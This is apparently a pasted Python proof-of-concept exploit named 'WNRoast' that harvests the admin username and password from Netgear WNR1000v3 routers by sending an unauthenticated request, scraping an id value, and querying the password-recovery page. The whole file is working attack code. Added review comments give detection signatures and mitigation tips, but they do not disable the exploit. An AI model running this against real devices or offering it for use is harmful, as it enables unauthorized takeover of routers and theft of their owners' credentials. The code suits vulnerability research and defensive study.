
wnroast.py

a guest Jun 15th, 2014 1,095 Never
  1. ######################################################################################
  2. # WNRoast Version 1.0                                                                #
  3. # Netgear WNR1000v3 Credential Harvesting Exploit (Proof of Concept)                 #
  4. # Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA  #
  5. # By: c1ph04                                                                         #
  6. #                                                                                    #
  7. # Not the prettiest, but I need to get this done before the baby wakes up            #
  8. ######################################################################################
  9.  
  10. import socket
  11. import urllib
  12. import urllib2
  13. import sys
  14.  
# Line terminator used when joining the raw HTTP request lines below.
CRLF = "\r\n"

# A bare GET for "/" that carries no credentials or session of any kind.
# NOTE(review): the "Host: none" header is a fixed literal in this script,
# so it is a usable log/IDS signature for this PoC as written.
request = [
    "GET / HTTP/1.1",
    "Host: none",
    "Connection: Close",
    "",
    "",
]
#---------------------------------------------------

# Target host and port are taken from argv[1] and argv[2] without validation.
target = (sys.argv[1], int(sys.argv[2]))
s = socket.socket()
s.connect(target)

s.send(CRLF.join(request))

# Keep reading until the peer closes the connection (recv returns '').
response = ''
while True:
    buffer = s.recv(4096)
    if not buffer:
        break
    response += buffer

# Everything after the first blank line is treated as the HTTP body.
header_data, _, body = response.partition(CRLF + CRLF)
  38.  
  39. #-----------------------------------------------------
  40.  
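def extract_between(text, sub1, sub2, nth=1):
    """Return the part of *text* between *sub1* and the next *sub2*.

    The text is split on *sub1* at most *nth* times and the last piece is
    searched for *sub2*; the result is whatever precedes *sub2* in that piece.

    Args:
        text: String to search.
        sub1: Opening marker.
        sub2: Closing marker.
        nth: Maximum number of splits on *sub1* (default 1, i.e. the text
            after the first occurrence).

    Returns:
        The substring between the markers, or None when either marker is
        missing.
    """
    # Previously a text without sub1 fell through and the prefix before sub2
    # was returned as if it were a match; report "not found" instead.
    if sub1 not in text:
        return None

    tail = text.split(sub1, nth)[-1]
    if sub2 not in tail:
        return None
    # [0] is the text before the first sub2 for any nth >= 1.
    return tail.split(sub2, nth)[0]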
  46.  
# The body of the unauthenticated response is searched for the first `id=`;
# everything up to the next double quote is taken as the id value.
# NOTE(review): as this script reads it, the device hands that id to a client
# that has not logged in, which is the condition the rest of the PoC relies on.
text = body

# repr() plus quote-stripping turns a missing match (None) into the string
# 'None' rather than raising.
uid = repr(extract_between(text, 'id=', '\"')).replace("\'", '')
  52.  
  53. #-----------------------------------------------------
  54.  
# Request the password-recovery page with the id taken from the first response.
# NOTE(review): for defenders, a request to /passwordrecovered.cgi from a client
# with no authenticated session is the event to alert on. The header of this
# file lists WNR1000v3 firmware V1.0.2.60_60.0.86 and V1.0.2.54_60.0.82NA as
# tested; keep the management interface off untrusted networks and check the
# vendor for fixed firmware.

# Host and port come from argv again, with any single quotes stripped.
ip = sys.argv[1].replace("\'", '')
port = sys.argv[2].replace("\'", '')

url = ''.join(['http://', ip, ':', port, '/passwordrecovered.cgi?id=', uid])

# An empty but non-None data argument makes urllib2 send this as a POST.
data = ''
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
  71.  
  72. #-------------------------------------------------------
  73.  
# Scrape the table cells that follow the "Router Admin Username" and
# "Router Admin Password" labels in the returned HTML.
# NOTE(review): the script expects both values in readable form in the
# response, so on an affected device the admin password should be treated as
# disclosed and rotated once the device is fixed or taken off the network.
user_cell = repr(extract_between(the_page, 'Router Admin Username</td>', '</td>'))
# Second pass keeps only what follows the first '>' of the cell's repr().
username = repr(extract_between(user_cell, '>', '\'')).replace("\'", '')

pass_cell = repr(extract_between(the_page, 'Router Admin Password</td>', '</td>'))
password = repr(extract_between(pass_cell, '>', '\'')).replace("\'", '')

# Banner followed by the two scraped values ('None' when nothing matched).
print """

 WNRoast Version 1.0
 =========================
 By: c1ph04

 """
print "\n WNRoasted!\n"
print " Username is: " + username + '\n'
print " Password is: " + password